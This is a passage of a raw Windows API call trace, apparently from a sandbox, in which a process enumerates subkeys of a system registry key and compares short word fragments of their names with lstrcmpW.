(lpString="Lsa") returned 3 [0030.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8090 [0030.613] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0030.613] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0030.613] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0030.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e80b0 [0030.613] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0030.613] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0030.613] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e80b0 | out: hHeap=0x6d0000) returned 1 [0030.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6ed498 [0030.613] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0030.613] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0030.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed4c0 [0030.613] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0030.613] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0030.613] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0030.614] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0030.614] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0030.614] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0030.614] lstrlenW (lpString="LsaInformation") returned 14 [0030.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e80b0 [0030.614] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0030.614] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0030.614] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0030.614] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0030.614] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0030.614] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0030.614] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0030.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e80b0 | out: hHeap=0x6d0000) returned 1 [0030.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x6edf58 [0030.614] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0030.614] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0030.614] lstrlenW (lpString="MediaCategories") returned 15 [0030.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e80b0 [0030.614] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.614] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.614] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.614] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.614] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edf88 [0030.614] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0030.614] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0030.614] lstrlenW (lpString="MediaDRM") returned 8 [0030.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e80d0 [0030.614] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.614] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.614] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.614] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.615] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0030.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e80d0 | out: hHeap=0x6d0000) returned 1 [0030.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e80d0 [0030.615] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0030.615] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0030.615] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0030.615] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0030.615] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0030.615] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0030.615] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0030.615] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0030.615] lstrlenW (lpString="MediaInterfaces") returned 15 [0030.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e80f0 [0030.615] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.615] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0030.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e80f0 | out: hHeap=0x6d0000) returned 1 [0030.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edfb8 [0030.615] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0030.615] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0030.615] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0030.615] lstrlenW (lpString="MediaProperties") returned 15 [0030.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e80f0 [0030.615] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.615] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.616] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0030.616] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e80f0 | out: hHeap=0x6d0000) returned 1 [0030.616] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edfe8 [0030.616] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0030.616] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0030.616] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0030.616] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0030.616] lstrlenW (lpString="MediaTypes") returned 10 [0030.616] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e80f0 [0030.616] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.616] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.616] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.616] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.616] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.616] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0030.616] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e80f0 | out: hHeap=0x6d0000) returned 1 [0030.616] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e80f0 [0030.616] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0030.616] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0030.616] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0030.616] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0030.616] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0030.616] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0030.617] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0030.617] lstrlenW (lpString="MobilePC") returned 8 [0030.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed4e8 [0030.617] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0030.617] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0030.617] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0030.617] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0030.617] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0030.617] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0030.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e8110 [0030.617] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0030.617] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0030.617] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0030.617] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0030.617] lstrlenW (lpString="MPDEV") returned 5 [0030.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8130 [0030.617] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0030.617] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0030.617] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0030.617] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0030.617] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0030.617] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0030.617] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0030.617] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0030.617] lstrlenW (lpString="MSDTC") returned 5 [0030.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8150 [0030.617] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0030.617] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0030.617] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0030.617] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0030.618] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0030.618] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0030.618] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0030.618] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0030.618] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0030.618] lstrlenW (lpString="MUI") returned 3 [0030.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8170 [0030.618] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0030.618] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0030.618] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0030.618] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0030.618] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0030.618] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0030.618] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0030.618] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0030.618] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0030.618] lstrlenW (lpString="NetDiagFx") returned 9 [0030.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8190 [0030.618] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0030.618] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0030.618] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0030.618] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0030.618] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0030.618] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0030.618] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0030.618] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0030.618] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0030.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e81b0 [0030.618] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0030.618] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0030.618] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0030.618] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0030.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e81d0 [0030.619] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0030.619] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0030.619] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0030.619] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0030.619] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0030.619] lstrlenW (lpString="NetTrace") returned 8 [0030.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e81f0 [0030.619] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0030.619] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0030.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e81f0 | out: hHeap=0x6d0000) returned 1 [0030.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e81f0 [0030.619] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0030.619] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0030.619] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0030.619] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0030.619] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0030.619] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0030.619] lstrlenW (lpString="Network") returned 7 [0030.619] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed510 [0030.620] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0030.620] lstrlenW (lpString="NetworkProvider") returned 15 [0030.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed538 [0030.620] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0030.620] lstrlenW (lpString="Nls") returned 3 [0030.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8210 [0030.620] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0030.620] lstrlenW (lpString="NodeInterfaces") returned 14 [0030.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e8230 [0030.620] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0030.620] lstrlenW (lpString="Nsi") returned 3 [0030.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8250 [0030.620] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0030.620] lstrlenW (lpString="PCW") returned 3 [0030.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8270 [0030.620] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0030.620] lstrlenW (lpString="PnP") returned 3 [0030.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e8290 [0030.620] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0030.620] lstrlenW (lpString="Power") returned 5 [0030.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e82b0 [0030.621] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0030.621] lstrlenW (lpString="Print") returned 5 [0030.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e82d0 [0030.621] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0030.621] lstrlenW (lpString="PriorityControl") returned 15 [0030.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed560 [0030.621] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0030.621] lstrlenW (lpString="ProductOptions") returned 14 [0030.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed588 [0030.621] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0030.621] lstrlenW (lpString="Remote Assistance") returned 17 [0030.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed5d8 [0030.621] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0030.621] lstrlenW (lpString="SafeBoot") returned 8 [0030.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e82f0 [0030.621] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0030.621] lstrlenW (lpString="ScsiPort") returned 8 [0030.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e8330 [0030.621] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0030.621] lstrlenW (lpString="SecurePipeServers") returned 17 [0030.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed600 [0030.622] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0030.622] lstrlenW (lpString="SecurityProviders") returned 17 [0030.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed650 [0030.622] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0030.622] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0030.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed6a0 [0030.622] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0030.622] lstrlenW (lpString="ServiceProvider") returned 15 [0030.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed6c8 [0030.622] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0030.622] lstrlenW (lpString="Session Manager") returned 15 [0030.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed6c8 [0030.622] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0030.622] lstrlenW (lpString="SNMP") returned 4 [0030.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e8390 [0030.622] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0030.622] lstrlenW (lpString="SQMServiceList") returned 14 [0030.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6ee048 [0030.622] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0030.622] lstrlenW (lpString="Srp") returned 3 [0030.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e83b0 [0030.622] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0030.622] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0030.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e83d0 [0030.623] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0030.623] lstrlenW (lpString="StillImage") returned 10 [0030.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e83d0 [0030.623] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0030.623] lstrlenW (lpString="Storage") returned 7 [0030.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed718 [0030.623] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0030.623] lstrlenW (lpString="SystemResources") returned 15 [0030.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed740 [0030.623] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0030.623] lstrlenW (lpString="TabletPC") returned 8 [0030.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed768 [0030.623] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0030.623] lstrlenW (lpString="Terminal Server") returned 15 [0030.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed790 [0030.623] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0030.623] lstrlenW (lpString="TimeZoneInformation") returned 19 [0030.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e8410 [0030.623] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0030.623] lstrlenW (lpString="usbflags") returned 8 [0030.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed7e0 [0030.624] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0030.624] lstrlenW (lpString="usbstor") returned 7 [0030.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed808 [0030.624] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0030.624] lstrlenW (lpString="VAN") returned 3 [0030.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8450 [0030.624] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0030.624] lstrlenW (lpString="Video") returned 5 [0030.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8470 [0030.624] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0030.624] lstrlenW (lpString="wcncsvc") returned 7 [0030.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed830 [0030.624] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0030.624] lstrlenW (lpString="Wdf") returned 3 [0030.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8490 [0030.624] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0030.624] lstrlenW (lpString="WDI") returned 3 [0030.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e84b0 [0030.624] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0030.624] lstrlenW (lpString="Windows") returned 7 [0030.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed858 [0030.624] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0030.625] lstrlenW (lpString="Winlogon") returned 8 [0030.625] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed880 [0030.625] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0030.625] lstrlenW (lpString="WMI") returned 3 [0030.625] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e84d0 [0030.625] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0030.625] lstrlenW (lpString="hivelist") returned 8 [0030.625] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed8a8 [0030.625] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0030.625] lstrlenW (lpString="SystemInformation") returned 17 [0030.625] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ee090 [0030.625] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0030.625] lstrlenW (lpString="Winresume") returned 9 [0030.625] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6ee090 [0030.625] RegEnumKeyW (in: 